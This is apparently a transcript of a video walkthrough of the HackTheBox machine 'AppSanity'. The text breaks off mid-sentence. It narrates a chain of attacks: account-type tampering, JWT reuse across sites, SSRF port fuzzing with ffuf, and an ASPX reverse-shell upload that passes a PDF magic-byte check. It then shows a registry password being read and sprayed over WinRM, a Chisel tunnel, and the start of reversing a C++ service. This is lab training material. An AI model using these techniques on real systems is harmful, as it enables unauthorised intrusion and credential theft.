What's going on YouTube? This is IPSec. I'm doing AppSanity from HackTheBox, which starts off with some web exploitation. It's not too technically challenging, but the chain is relatively large. That does make it difficult because there is two websites that is part of this, right? It starts off with a user account generation, and when you register your account, you can change the account type you are, so you can become a doctor. And that gives you a cookie of a doctor user. And the second website uses the same secret for that cookie, which is a JWT, so you can replay that and gain access. And then there's a server-side request forgery attack and also a file upload vulnerability. So you can upload ASPX Web Shells to the web server and then use the SSRF in order to access them. And then once you get a shell on the box, there are two reversing challenges. The first is .NET, the second is C++. So with that being said, let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it AppSanity, then the IP address of 10.10.11.238. This could take some time to run, so I've already ran it. Looking at the result, we just see two ports open. The first one being HTTP on port 80, and it's running IIS and redirecting us to meddigi.htb, which isn't AppSanity. It's a little bit odd, but let's just go ahead and add this to our host file. So we can add 10.10.11.238, and then that host. And it is redirecting us to the SSL version of that website. And we make a request there. It doesn't really give us anything. I'm guessing it just didn't trust the certificate or something like that. The one notable thing is this is a Windows box, and there could be other ports likely open just because nmap's top 1000 doesn't detect WinRM. I think if we do like locate top 1000, let's see, let's go to nmap ports top 1000. I'm going to search for 59. Ooh, that's a lot. 59.8. We can see it doesn't do 5985 or 5986, which I think is WinRM and WinRM SSL. If we did a nc-zv 10.10.11.238 5985, we can see that port is open. So with Windows boxes, I do like scanning a full port scan just so I can see if WinRM or other things are open. Windows is known for having just a lot of ports open, especially like domain controllers. So let's do a nmap-p 10.10.11.238. And then we'll output all formats into nmap AppSanity all ports and let that go for a little bit. So let's go take a look at HTTP meddigi.htb. Was it 2Ds or 1D? 2Ds. And there we go. It is loading. It redirected us to HTTPS. And we get a medical site, right? The first thing I want to do, though, is check the SSL certificate to see if there's any other host names associated with it. So we just see the common name. The main field I'm looking for is like alternative DNS names or alternate names in general. Don't see anything. But let us just do a dir bust anyways to see if there's anything there. So I'm going to set up FFUF. Actually, we can use GoBuster. Let's do GoBuster VHost. And then let's see. I forget all the flags for this. It's probably just hostname and word list, I would think. Word list, up, sec list, discovery, DNS. Let's do subdomains, top million. Sure, that's fine. I think -u or host. Is it host or URL? Maybe -u. Yep, URL. So -u, http, meddigi.htb. And if this doesn't find anything, I'd also try SSL as well. And we can do out file, GoBuster, vhost, http. There we go. And let that run while we take a look at what features are available to us on this website. So just clicking around, it looks like it is a single page thing. We have request a callback. So let's just put information here. Test. Let's see what this form is doing. Let's send this over to Burp Suite. proxy intercept is on. Submit. And we see it's doing a callback here. We could try just putting some type of cross-site scripting thing. So like image source is equal to HTTP 10.10.14.8 port. We'll do 8,000, I guess. Like that. And I guess we should put that for the message as well. And subject. So normally when I do it, I'd also put like a tag so I know what it is. So if we did get a callback here, I would know, oh, the callback was in this parameter, right? So this will be the source. That's fine. Name. There we go. So let's stand up a listener. So Python 3 HTTP server. So we just keep that running while we send this. And then going back here, our submission contained errors. So I guess they have some type of cross-site scripting filter in place. We could keep playing with that. I'm not. I'm going to use the power of hindsight and know that's nothing there. But I would start putting just random characters in each field to find out which one has the filter. It's likely the name, or maybe all of them are preventing that, right? Let's try signing in. We need an email. We could try like admin@meddigi.htb, password, and try a few passwords there. We get email or password is invalid. Let's sign up for an account. So I'm going to do just a basic account. Let's do password is equal to we need one number, password 1. Okay. There we go. Let's do 555. Okay, so now we have the sign up form. Let's go inspect this. We do sign up, and we can see all the parameters. Name, email, password, date of birth, phone number, country. We have account type, which is something we did not specify, and it's equal to 1. So I'm curious if I change this, if our account changes at all. The first one I would try is 0, because normally the first like account, if it's a group, is going to be admin. And then also try the one after user 2 if that doesn't do anything. But let's just forward this sign up request and log in. So we can do root at ipsec.rocks, password 1. We sign in, and we can send a message to the supervisor. So again, let's try cross-site scripting. 10.10.14.8, 8,000, message to supervisor, /image. There we go. We could also try changing our password here. If I knew the email address of the admin, I may try like a IDOR vulnerability. Let's try changing our password to 2 so we can explain that. So if I change password to 2, intercept request, save. Let's see, we got name, email, phone number. I did not change it to 2. I don't know. Oh, it puts our email here, but again, we don't know the admin's email. We could, if we did, we could try just putting the admin email here, and maybe we could change the password. So let's drop this request right now. And I'm going to look back at the profile, get a visual of it, see what it looks like. And then we're going to log out and create another account. So let's do sign in. Let's do another account. Put junk here. Account 2 at ipsec.rocks. Password 1. Password 1. I wonder if that's even going to work for the year. Okay. Let's go to Burp Suite, intercept, sign up. Account type is 0. Forward. Sign up failed. Let's just try changing the account type to 2. And I think I said account 2 in the email. I meant 1, but doesn't really matter. We are really old. There we go. Intercept on, sign up, account 2, there we go. Forward. We have created an account, so we can do account 2 at ipsec.rocks, password 1. And we have something different. We can add a patient here. But before I look at this, we have this vulnerability. We should report it. The other thing we should be doing, though, is seeing if that IDOR vulnerability we talked about previously exists. So I'm going to log out. I'm going to try signing in. I'm going to use my first account, so root at ipsec.rocks, password of password, or password 1. ipsec.rocks, password 1. And this piece is completely unneeded for the box, but whenever I do pen testing, this is kind of the workflow I follow, right? Let's see, we just need password 2, intercept on, let's save. So you can see I put that password in, and we can say account 2 at ipsec.rocks. We can forward this. We don't get any error. Let's log out. Let's sign in. Account 2 at ipsec.rocks, password 2. Sign in. And it doesn't work. So that vulnerability is not like an IDOR. They have some protection in place there. That's checking my session to make sure I'm only changing my own password. So let's do password 1, log in, and let's see what this supervisor panel is. So if I click add patient here, let's see. We have this access token, and we really don't know. It says selected patient ID 7. So I guess there's 6 other patients potentially. So we added the patient as supervised. And let's just go take a look at our GoBuster. It is only halfway done. Okay. Let us log out. We can see if our regular account is any different. Root at ipsec.rocks, password 1. And we just see a supervising doctor right here. I'm curious if I send a note if that goes over to him. So let's sign in. Account 2 at ipsec.rocks. I probably should do this in like incognito mode or something like that so we can quickly see it, but I don't see any way to get messages from the user. So I'm guessing there's probably going to be some type of different like URL that I can hit. So maybe I should GoBuster this, or maybe there's a subdomain, right? And let us run the same brute force, except I'm going to do the HTTPS version as well. And let's make that a smaller word list so it goes quicker. Apparently that is too big of one to go quickly. So let's change this, top million. I'm just going to do 5,000. That should be quicker. We need HTTPS, and we can add -K so it accepts that invalid SSL certificate. And then let's run, and top 5,000 will go much, much quicker. And it immediately found portal.meddigi.htb. So you should always have some type of recon going in the background because you can't really hack time. So it's always nice to be running like those GoBusters while you work, because when you get a dead end, you go back there and maybe it will reveal something important, right? So let's go add portal.meddigi.htb. Let's take a look at it. HTTPS. There we go. And we need a doctor reference number. And we don't have that. Account 2 at ipsec.rocks. I'm going to do 7. Maybe that's like my patient ID. and we have email reference ID is invalid. So let's go take a look at the host headers real quick. Just want to compare this. Let's see, we do see this is IIS. It is still going to be some type of .NET, just because we can see AppNet Core MVC cookie tamper protection. If I did that on any other one, let's go back to HTTP history. Let's go to one that's not Portal. This is fine. We see similar cookies. So we know we're still in the same language. If I saw like a PHP cookie, that'd be definitely interesting, but we're definitely pen testing a .NET application. Now, one thing I always like testing for when there's multiple logins is, are they using the same like authentication method, right? If I go back into my request to the portal, we could just do that here. So we're the doctor right now. Let us clear this, intercept on. When I send something, I'm sending these cookies, and we have this access token. If I look at what the access token is, let's see, that's just going to be this field. We see unique name 8, email. This is probably not valid before. Expiration, time, issuer, meddigi. So we have a JWT that's signed. Let's go ahead and add this access token to our cookies on this. So I'm just going to press F12. We can go into storage, click this little plus icon to create a cookie and access token. I can make this bigger for you. And then let's do the value. I'm going to paste the JWT. And now when I make a request here, I'm going to send the cookie as well. And if it's using the same JWT and secret in the whole format, this is just going to magically authenticate me, which is somewhat common for web applications. And we can see there we have it. We are now into the doctor panel. So let's take a look at everything we can do. We can update a profile. When we update the profile, I'm not seeing any extra fields. We may be able to change our account type to 0 here if we know that's an admin, but I'm not going to muck with that. Let's see, we have a scheduler, start date. Let's do that, end date, schedule. I have no idea what that just did. If I look at prescriptions, let's see, we have 2. If I click on this link, we have a thing to view prescription, and it brings us there. Let's try root at ipsec.rocks, and then prescription link. I'm going to put my own web server. So 10.10.14.8, port 8000. We still have our Python web server running from before. So we can say prescription scheduler, and then submit this. We get a file not found message. And if I go here, we have a 404. So we know this is server-side request forgery here, right? Let's try doing a HTTP 127.0.0.1 port 80. What happens here? We probably don't even have to specify port 80. Let's just do submit. It's taking its sweet time. Maybe it doesn't have a listener there, or maybe it redirected to 443 and failed. I'm not exactly sure. Start intercept on. We get the request. We can forward it. Error occurred. That's all we get. And it gives us the login panel. So I think maybe this is showing us the page it got to. I'm not exactly positive what went on there. If I refresh this page, I don't see any new prescriptions. But we know we have a server-side request forgery. Let's go here. We have a request form, and then we have a file upload. So let's do a file upload. Patient ID must be 6 digits. IPSEC, I don't know the department. Let's enter a phone number. There we go. Data visit. That's fine. I'm just going to upload README to see exactly what this form looks like. When we submit it, this is what that is. So we can forward it along. And we see only PDFs are allowed. So let's try uploading something else. We probably have to do a phone number. Okay. I'm going to add that, but we're going to change the name so it has PDF in it. I want to see exactly how it's detecting this PDF. That is my goal right now. So we have the file name here. If I append.pdf, we forward this along. We still see it's only allowing PDFs. So maybe it's checking the magic bytes. So let's try adding the magic bytes of a PDF. So we can go back to this, intercept on, submit. And here's where the file begins. The magic bytes of a PDF is %PDF dash. If you look at like the RFC, all PDFs begin with this, right? We could just look at our box if we didn't know that. So I do like locate star.pdf, find any old PDF and open it up in some type of hex editor. And we can see this is the magic byte. We could do even 1.4 if we wanted to, but we just need the dash. So now we have the PDF in it. If we forward it along, we have the examination report has been sent to management. So we have uploaded a file. Now this is a ASP web server. So I want to get a ASPX web shell in order to trigger some type of file upload vulnerability. It's a lot like PHP. We can just upload a .php script to the web server, execute it, and get code execution, right? So I'm just going to Google ASPX reverse shell. And let's turn Burp Suite. It is not intercepting. And let's see, is this going to be a good one? Shell.aspx. I probably could find one that just exists within my repo, but let's just pull this down. Okay. Let's wget this, edit shell.aspx, and we want to change the host and port. So we'll do 10.10.14.8, port 9001. Okay. NCLVNP 9001. There we have it. Now let's upload this. So patient number, name, department, phone number, whatever. And now we want to go to HTTP, AppSanity, shell. Make sure we are intercepting. And let's see. Let's just put a %PDF dash. Forward it along. Okay, so now we have uploaded it. What we have to do is try to find it, right? I'm going to try like /shell.aspx. We just get redirected back here. We could try /uploads to see if that exists. /uploads with a capital slash. We have to figure out how to execute this. So let us go over to GoBuster and set up a brute force, because maybe it'll find like a wordless directory, right? So we can say GoBuster dir. Let's not do subdomains. Web content. Raf small words dot lowercase. I'm doing dot lowercase because Windows is not case sensitive, so it doesn't really matter, right? If we do /profile, if we did undercase profile, it still goes through. So this saves a lot of just request if we specify lowercase. Let's see. We also need let's see. The cookie. How do we specify cookie in GoBuster? dir-h cookie-c. And we want to grab that access token, right? So if we just grab anything, you can grab this. I wonder if we need that anti-forgery token. That could throw a wrench into this. Let's see. because everything is redirecting to 302, GoBuster doesn't look like it wants to work. We could specify a blacklist of 404 and 302. There we go. And this looks better. We have profile, error, home. So that is working. I wonder what /error looks like. It just says error. That is helpful. So let's see. We have that server-side request forgery that we can play with. Is that in scheduler? No, that was prescriptions, right? So let us do root at ipsec.rocks. Let's say HTTP 127.0.0.1. And I'm going to play with this in repeater. So let's turn intercept off, or intercept on. Go here. I hope this doesn't like forward my request. I want to be able to access it immediately. And I think when I'm doing this, because I'm GoBustering, this is going slow. So I'm going to kill the GoBuster. We probably could change like the threads if we really wanted to work while we did this down to like 1, and then maybe it won't be so slow. Right? That's another way to do it. And it could just be a timeout because it's like a server-side request forgery is trying to access port 80 on 127.0.0.1. And for some reason, that's not working, right? It may not be GoBuster at all slowing my request down. Okay, so we have error occurred. Let's try 443 and make that HTTPS. Let's click send. Error occurred instantly. So we have 214 milliseconds. Let's try 4/8. That shouldn't be listening. This is taking 2 seconds. Instantly. So when it can talk to a port, it looks like it is instant, at least with HTTPS. But when we can't, it takes a long time, right? So I'm going to do 9001 here. There we go. Now it's hanging. So that's what we want to be able to fuzz with, because I'm looking at this response. It looks the same. We just have error occurred or yes. Let's see, %20. Let's try 5985. Try to eyeball this. 176 bytes back, 176 bytes back. It looks the same. So I think the only way we can play with this is through finding the time. So I'm going to write FFUF here. I'm going to change request method. No, I want to copy to file. So let's put this in AppSanity, and I'm going to say send prescriptions request. Okay. And the reason why I did this is because I'm going to fuzz this with FFUF, and I save the request to a file because that just makes it easier for me to use FFUF, right? Because I don't have to specify all the cookies, the host header, all those things. I can just go specify the parameter I want to fuzz with, right? So let's do FFUF-H, and I want to say it's -request, right? Yep, we need -request. And there is request proto, but I think we're doing HTTPS. We are. So that's the default. We don't have to specify HTTP. If you were doing HTTP, you'd specify it there, right? So let's do FFUF -request, and we called it send prescription.request. Then we word a word list. I'm going to do 0 through 1,000, or let's do 10,000. And if you don't know, if you did this, it would execute the code. If you replace that dollar with a less than sign, it'll execute the command and then treat it as a file. It's really handy for making this word list, right? So we have the request, we have the word list. I need -K to accept the SSL certificate. And let's hit enter. Fuzz defined, but not found in anything. Oh, I put FFUF here. You do fuzz where you want to replace it. There we go. And I'm just going to run this. I want to look at all the results. And the one thing I see is we are overloading the server right now. We can see it goes up to like 8,000 milliseconds, and we don't want that. That's happening because we're doing 40 threads, and that's just too much for this server to handle, right? Again, we notice it because when we started off, everything was 2,000 milliseconds, then we got to 4,000, then 6,000, 8,000, it just ramped up. And whenever you see that, decrease the number of threads, and you probably get better results, right? So here we have 104, now 2,000, the occasional 4,001, but that's fine. I want to get to port 80, and I want to see it not be 2,000 milliseconds. And then we're going to create a filter for time, and there we have it. We have 80 is under 100. So you can do -ft for filter time, and then I think it's filter anything greater than, let's do 1,500. Let's see. There we go. And you can see the filter is in place, so response time greater than 1,500. And port 0, it worked right away. I'm not exactly sure why. Maybe that just errors because it isn't a port. Once we hit 80, we're hoping to see 80 pop up. We do. So everything looks to be fine. We have the SSRF working. Port 100, we don't know exactly what that is. We can look at the results this way. So if I do port 100, let's take we can just drop that, I guess. Submit. Let's see what happens here. We just get a link preview of this, which is odd, but okay. 137, that's going to be like the Windows RPC port. So I'm going to just pause the video. We'll let this keep going to see if there's any other ports that are interesting. And after I paused the video, I realized how slow this is going to take. It's not doing a good job because there's a lot of ports over 10,000 that we'd want to scan. And I don't want to tell this to scan all 65,535 ports because we'd be here a while because we're only going at 4 per second, right? So let's go do a quick Google. Let's see. We can disable that. Let's say nmap top 1,000 list. And the reason why I didn't want to use the list before, because it did things like 5987 to something, right? And I didn't feel like figuring out how to expand upon that. I'm sure someone online has done that for me. So if we go to this one, let's see. That is, again, expanded. Oh, this is the sec list. So that's the one we did. Maybe this one. Top nmap port CSV. Let's see, TCP map sorted. I don't know the difference between these. Top 1,000 most popular TCP ports, nmap sorted. Okay, I wonder if one of those is like, I don't know. But there we go. This looks better. Oh my God, that's a lot of numbers. Let's see. We'll do top 1,000 dot list, I guess. Let's just wget this. Okay. We want to replace all commas with, is it \r \n? Maybe just \r. Nope. Undo. %s, comma. I can't remember if it's \nr or rn. That doesn't look like. Let's just do n. Let's see. Maybe that's good. It looks fine. I could just strings it, and that would make it better if that doesn't work. So let's go back to FFUF. And let's change our word list to that. And that's definitely not working. Let's change our word list to temp. Let's see if that does anything. There we go. So before I was terminating the string a bad way. So if I do top less, we can see every line break. Yeah, I did it backwards. I think it's null byte then 0A, right? So this is 80 and then that. Let's look at my other one while that goes. We just do 0A. So that is probably just the return. So I should have that memorized how I do it, but at least my troubleshooting skills I know, because that's definitely what is key. But we do see port 8080 open. So let's go take a look at what that looks like. So let's see port 8080, submit. We're waiting on it. It's definitely taking longer than I expected. Let's just refresh. Oh, we have something. It gave us a link preview. If we go view report, we can see the file here, right? So I click view report and I can't see the actual file, but we do have a link portal.meddigi or meddigi, then view report file cardiology. So we want to be able to get to ours, right? If I refresh this, it's just link view, and I don't see much else. Let's try uploading a request again. So let's upload report, and I'm actually going to modify my shell.aspx. It was %pdf dash. That way I don't have to worry about intercepting in Burp Suite. So patient number, patient name. We have no email. Root. I was hoping we'd have an email, but can only contain letters. Okay. Upload shell ASPX. So examination report sent. Let's go back to issue prescription. Recipient's email. Prescription link, HTTP. We wanted port 80. I'm going to add a slash to the end of that. There we go. We have a prescription here. If I click view link, we can see it is at shell.aspx. So I'm going to copy link, and we can see where it's uploaded to. View report ASPX file this. So let us go back to, oh, there we have 5985. What if my nmap list isn't updated? Because that definitely does look like it exists. Okay, we are listening on 9001. Let's hit this. It's thinking. We don't get a shell. So let's send this URL over to the subscription. So we can send that, submit. Because maybe we can only view reports off the server. Maybe they don't have it exposed to outside of the doctor's office, right? That is my logic I'm going with here. And we're not getting any response back. Did it just error? Link preview. Okay. No shell. So I'm going to change this to 127.0.0.1, port 8080. We'll get rid of HTTPS. Submit. Because maybe this link also, or this whole path works off of 127.0.0.1. And there we have it. We have a shell back. So that is what we had to do. And the very first thing I do, I'm trying to maximize this. I don't know why my Vim hotkeys aren't working. That's weird. I forgot to use RL wrap. So I'm just going to repeat this process. Something is wrong with my keyboard. Oh, I have caps lock on. I wonder if that did it. There we go. That was the issue. Okay, let's RL wrap. Let's send that request again. That looks fine. There we go. RL wrap just gives me like the up and down arrows, which is nice. It also lets me clear the screen. So the first thing I always like running is the whoami/priv. Didn't list my username. Let's just do whoami as well. So we are AppSanity exam panel, and we don't have SE impersonate privilege. And since we're not like local surface, I can't run full powers, which we did in the last Windows video, to restore my privileges. We're an actual, maybe as an app pool account. I don't know exactly the terminology. But the next thing I always do is try to find out where the database password, things like that is, because maybe I can crack caches. So on Windows, that's probably going to be in like inetpub. There it is. Let's see. www root. This is just the IIS. Let's see. We got the meddigi. Access denied. Meddigi portal. Denied. Examination panel. There we go. Go in there. And let's see, we have view report. So that's where we got the code execution from, right? We could type that out and see. I guess it's just loading it from a DLL. So that's probably going to be in bin. There we go. I'm guessing it loaded it from this examination management. Examination panel, view report. Let's see. Let's just download these files. Make dir, SMB. Let's do impacket, SMB server, SMB to support. And let's see, what is it? Is it share name first and then working directory? Share name, share path. So let's do share and then our current working directory. Run that with sudo so we can listen on 445. And now we should be able to copy. So let's do star.dll to 10.10.14.8 share. And I think it's copying. CD SMB. There we go. We have one DLL. And it is copying the full thing. It's just taking a while. Not the fastest copy, but it is going one at a time. So we have the examination panel management.dll. So we want to copy that over to a Windows host so we can start reversing it, right? And if we do a file against it, I knew it just based upon like how it's loaded from .NET. That was a .NET assembly, but you can do a file and see it is that as well. So I want to run dnspy against it. So let's go over to our Windows box. And I've already copied the DLL here because it saves me like dragging it to my host and dragging it here. But let's just go to tools, .NET, dnspy. And now let's do, is it file open? There it is. Desktop, examination panel. And let's take a look at this .NET. We have examination management, global, nothing really there. Let's go to examination panel. If we do report, view report, this is how we review it. And then we can see there is a encryption key from registry value. and it's doing a open subkey on software meddigi, and that is HKey local machine. So it's getting this key, and the key's name, let's see, is encryption key. So let's view this registry key. So let's go back to where our shell is. And then we can say reg query, HKey local machine, software meddigi. Reg. There we go. And we can see the key, encryption key, is set to I got the remedy. So we have some type of credential here. We don't know exactly what it goes to. We could do net user, and we get a list of all the users. So I'm going to make v users.list. I'm going to do administrator, SVC. Oh, we already have that account, I think. Or which one are we? We're exam panel. So we can say SVC meddigi portal. I guess we can see if this is the password to exam panel as well. Devdoc and this service account. So we have a list of those. And now I'm going to use netexec. And 445 wasn't open to us, but winrm was. So we can specify winrm and then meddigi.htb. The username is going to be users.list. The password is going to be that. I think that's all we need. Set enter and see if it starts going. And there we have it. We have one. We have the devdoc user has this password. So let's use evil winrm to access it. So evil winrm -I meddigi.htb user devdoc password. I got the remedy. And there we have it. We are now logged in as devdoc. So let's see what's special about this user. If I do whoami/priv, we see pretty much the same thing. We could do net user devdoc, and this should tell me the groups I'm a part of. We don't really see anything too special. The remote management, which that's why we can use winrm. So looking at the directory of documents, there's nothing here. We can go into desktop, and there's nothing there. So I'm going to run WinPs. And I was just like uploading things to program data because that is just world writable. I'm guessing the flag was actually on this user up here for the low priv shell. But let's grab WinPs. So I have it in opt-ps, WinPs64. And I'm going to make it in dub. That. And we already are listening somewhere. This one. I probably shouldn't have ran the web server out of just AppSanity, because if someone came and found that web server, you have all my files here, right? That's why I always like running it in dub, so I know that's where like the exposed files are. So let's just go back and do this. Man, I don't know why I can't type all of a sudden. There we go. All right, so let's see. Now I can just, I probably could have put in my SMB share as well. Curl HTTP 10.10.14.8 port 8000 winps.exe-o winps.exe and cannot. That is odd. It says the name could not be resolved 10.10.14 dot. Run that again. There's something odd going on. Oh. I could have swore I said .8. There we go. And it downloaded it. Let's go to the first one. Yeah, I do have .8. Maybe I escaped something and got rid of it. That is odd. So let's do winps.exe. And I'm probably going to pause the video and let this run, and then we'll just look at all the results. So WinPeas eventually did crash here, and I'm not sure exactly why it did. I'm sure if we just got a newer version of it, maybe we'll get past this, but let's see if it found anything before that crash. So I'm just going to search for WinPeas to get up to the top, and then let's go and look at what it highlights. So environment variables, I'm not too interested in. Looking at this stuff, I don't see anything too interesting there. It was looking at the PowerShell files. We didn't see anything there. Bunch of registry stuff. I think all this NTLM signing, if there were adjacent host, that'd be more interesting, but this is just standalone, so I don't really care about that. Let's see. Leaked handlers. I'd probably come back to this if I don't get anything. Whenever I see one of the results have a lot of like things like this right here and the registry thing, I just make note of it and we'll come back to it because it's probably some type of false positive if it's detecting 50 of the same item, right? So I'm guessing this is just path injection, but we probably don't have access to write to the path, so we can't really weaponize that. And there's a lot of them, so I'm just going to skip over it. I'm not sure what the task directory being able for authenticated users to write files. I don't think there's anything we can weaponize with that off the top of my head. Network information. And we see something odd. We saw it when we were doing the FFUF with all the ports. Port 100 is listening and it's report management. So let's see exactly what this is. If I search down, we can see report management is in program files, which we have not seen yet. So if we went to cd /progra1, and I just do that because it's a shorthanded way to do it without escaping the space, right? If I do dir c:, there's program files and program files x86. If I did progra2, it will take the second one, or I thought it would, and grab x86. Not sure why it did not there, but oh, because I'm in program files. So we did cd progra2. There we go, x86. We can put a slash there, do progra1, switch over to program files. We want to go into report management. And we can see a ReportManagement.exe, a helper. This is the Visual Studio C++ runtime. So this is not a .NET thing. This is going to be C++ most likely with these DLLs. We have a libraries directory. So if we go in there, let's do GCI. Is it forced to see hidden files? There's nothing in libraries. So let's go ahead and download the executables. So I'll download ReportManagement.exe, and then we'll also download Report Management Helper. And this download command is a thing of evil WinRM. It does have an upload as well, but I have mixed results when doing it with upload. So I normally only use the download functionality. Let's see. So we have the two files. Let's make report management and then move both of those into report management. And let's see. It looks like the helper we don't have access to, but we do have access to report management. So let us do a file against it to make sure it copied correctly. We have a executable. So let's open it up in Ghidra. And I'm guessing this is what listens on port 100. And I guess we probably should connect to it as well. So we know exactly what's happening. Let's do file new project real quick. And see what this looks like. It is C++, and the binaries here, not the easiest to reverse. I just want to make sure we can open this. Let's analyze it. Sure. Okay. Okay. So now we have the binary. We could look at imports. Let's go to exports, entry. In here. And I'm not going to see right off the bat anything that's easy to start reversing. The easiest thing to do is look at strings and then search for the strings and see where there's a reference in the program, and then go to that function and kind of explore, right? So I'm going to open up Chisel. Let's go and copy Chisel. So if we do www cp opt chisel chisel.exe, and then let's just go opt chisel server -p. Let's listen on 8001. I don't think we have to do reverse, or do we? I'll add the flag just so we have it. Okay, let's go back to program data. Wget HTTP 10.10 14.8 8000 chisel.exe chisel.exe. It looks like it is downloading. So we can do /chisel.exe client 10.10 14.8 8000. I want to say we want to do a reverse port 100 127.0.0.1. Chisel's not running as root on my box, so I can't do a privilege port here. I'm going to do 9100. We'll forward it to 127.0.0.1 100. See if that works. Chisel can't listen. I did something wrong there. So you cannot listen. Do I have errors here? No. Let's see. Remote exception. Do we have to specify that? No. Maybe I'll just do a dynamic socks because I'm not sure exactly what this issue is. Oh, 8001. We have the wrong host. Still can't listen. Is there a help? Let's see. Oh, it's R:. I would think this flags were the same as SSH. They're slightly different. This one should do it. So if I go here, there we go. We are now listening. So if I go here, SSLNTP grep 8100, we are listening there. It should forward through Chisel. So if I netcat localhost 8100, we go through and access localhost on the Windows machine on port 8100. So help, we have a few functions. If we try like backup, it says backup successful, validate, upload. Let's upload like our passwd, fail to upload. Don't really have too much. We could look at the strings. Let's see. Oh, it looks like Ghidra finally finished processing, but still, it's hard to identify everything. So if I did strings on the binary, I know we could look at it in Ghidra, but I think this will make it a little better. So let's strings, ReportManager.exe. Let's grep it for libraries because that's the directory that existed. I kind of want to see what it's for. The directory was empty. And we see the path is here. If I look at strings around this, so I go A3, B3 to go, is it dash capital A? Like that. There we go. It shows the 3 before, the 3 after. And we can see before it, we have invalid command missing parameter after upload, and it's executing libraries. We also have .dll and external upload. So I'm guessing external upload.dll is what we'd have to put in libraries. But that is a huge guess. So let's just play with this binary a little bit. So one of the things I would like doing is looking at everything it imports, and then we can see things it does. So we can see like create file, look for any suspicious functionality. So let's see, is there anything we want? I think there was one I wanted to look at. Let's see. I think it is in kernel 32. CreateProcess. So this is interesting. The binary itself is creating a process. So if we go here, we can go to the references, show references to this address, and we can see where that's actually being called in the program. It's currently decompiling it here. So let's just let it do its thing. Hopefully it finishes. It's thinking. I don't know why it's taking so long to decompile this. There we go. We're around here, right? Let's see. Create. Let's do this again. References to this address. There we go. So here we can see it create the process. If we trace kind of what LP command line does, let's do LP command line. Find the previous. We see it is local 1428. We can search that, go back. See, that's going to be something with report management helper. So this is probably executing the report management helper.exe, right? And if you didn't want to do it in Ghidra, we could do dynamic analysis. So let us copy ReportManagement.exe. I'm going to copy it to my SMB directory, IPA. And hopefully I can access this share on my Windows box. I'm not sure I can. Share. Awesome. We can. So we can just run this. And I'm going to use Process Explorer when I run this. Do I have it on the box? I don't know what proc watch is. That's a new one to me. Oh, it's just monitoring for new processes. That's not what I want. Let's see. I guess we have to use Edge to download it because I don't think I have anything else on this. Process Explorer. I'm sure it's on my machine somewhere. Okay, so here it is. Let's run this. And that's not what we want. What is it? Not Explorer. Process Monitor. ProcMon. That's what it was. And I have it on my computer. There we go. So ProcMon is the application I like using to monitor what a program does. So let's filter. Where is filter? Control L. Let's say process name is ReportManager.exe, and we want to include it. There we go. So now our ProcMon is only going to show us what this program does. I'm going to run it from the command line, so if it has anything on like standard error, we can easily see it. So when I run it, we see nothing because I said the wrong filter. We called it Report Manager. It's management. Add it. There we go. So we can see everything the program is doing. And there's a lot of things. So we want to filter some things out because we can't really look at 766 events right now. So let's go back to the filter. And let's see. There is like a success, right? Exit. What is it? Operation result. So we can do result is not success. Is that how we do it? That is odd. It's saying buffer overflow right there. We probably don't need all the registry, so we can just exclude these. So you can also do it this way. And let's see. We have path not found on this c:/inet pub. So we definitely want to create this. So let's copy this and make this directory. So probably easier to do it through the command line, but I forget how to do it recursive on Windows. inet pub examination panel. Is it examination panel, examination panel? It is. New folder. And then reports. Okay, so now that folder exists. Let us clear. We can run the program again. And let's see what it has. We don't have all these DLLs. We probably want them because I guess we don't have the Visual Studio runtime on a computer. We need c:/backup. And it's also possible we do have these, and it may be trying out of the current working directory first and then going to system32 and loading it. We see right here. Yeah. So I think that's what's happening. We need administrator backup. So let's create c:/users, administrator, and then backup. Okay. Clear the panel. Run it again. And let's see. So we have no more files here. So we probably want to put something in reports. So let's go back here. inet pub, examination panel, reports. Create a file. There we go. Okay. So we tried to copy this file, and we have access denied. Does it exist in administrator backup now? Administrator backup, it doesn't. I wonder if we just don't have permission to write there? Let's see. We should, because we created this directory as our user, but maybe we don't. I just switched to UAC, like an admin command prompt in case it's UAC. There we go. So we see that a lot less. So I think that is better. And if we go here, administrator, backup, we do have a file. So I think the program is still running. I think maybe it just forked. Let's try a netstat-an find string 100. And we see we are listening on port 100. And I don't have netcat on this box, so I'm going to keep switching back and forth. Maybe not. I don't think I can access this from my Linux box. Let's try. Did I connect? I don't see anything else here. Examination panel. We have a bunch of access denieds again. Timeout. So yeah, let's install netcat on a Windows. That would be quicker than fixing up the networking mode on my VM. So NC64, Windows, eternally bored, download it. localhost 100. There we go. So we can see the reports management console. Now, if I type upload, what happens here? I was expecting to see new things. We keep trying to do this backup. I'm going to change my filter around. So we're going to get rid of this result is not success. And I'll say path contains libraries. Because again, that's the directory we wanted to see exactly what's happening. We're never loading it. Do we ever contain program? Let's get rid of libraries. Huh. Let's close out. I'm going to do task kill, image name, ReportManagement.exe /f. So we've killed it. Let's run this again. Okay. So now that we've ran it, let's go back to our filters. I definitely want report is not success. Let's see, we are loading this. I wonder if I need to copy those DLLs. See, no more files. I'm going to copy all the DLLs over and see if that makes any difference. Okay. Go back here. Copy a winrm command. We want program files. Can I do this? No. That sucks. So I'm going to pause the video and just download each of these because you don't need to see me copy and paste 5 times. Okay, we should have all the files here. So I'm going to move star.dll to the SMB folder. Then we can go back to our Windows host, go on the share. And now we have all the files. And I'm actually going to put these in a folder called Report Management, as I think is what it was called. Paste it all. Okay. So now when I run it, we should get more things, or at least all those errors will go away. File locked with only readers. Did I not go into the directory? I don't know. Oh no, I did. We got report management there. Okay. Invalid parameter. Wonder if we need PDFs. It could also be like the space is screwing it up, right? Test.pdf. Okay, let's see if that does anything. We want to kill Then we want to clear and run. Okay, looking through this, DLLs. We can probably filter that, right? Exclude that. Name not found. So it's looking if this exists. It doesn't, so it probably creates it. Don't know why it's doing that. Okay. Let's try netcatting now. Netcat64.exe. Help. Upload test.pdf. So it tried to create the file. It does this to validate the directory exists. So we need to create this C:\program files report management libraries. So new folder, report management, then new folder, libraries. Okay. So now that we have that created, upload test.pdf, we have no more files. So let's try creating a file in here. It only lets us create a folder, which is annoying. CMD, program1, report, libraries. Let's save this. Oh, come on. C:\program files, report management libraries, all files, ipsec.dll. Let's save that. Now let's see what happens. Upload test.pdf. So we query directory. I was expecting it to see at least one file. Does that actually have to have content? It shouldn't. Huh. Let's kill and restart it. Task kill, ReportManagement.exe, terminated. Start it up. Where's netcat? Oh, we loaded the wrong one. I'm just going to copy NC64 into this so I don't make that mistake again. Okay. So we do a query, and we get full directory information. And this should have showed us the files in it, but it did not. I wonder if 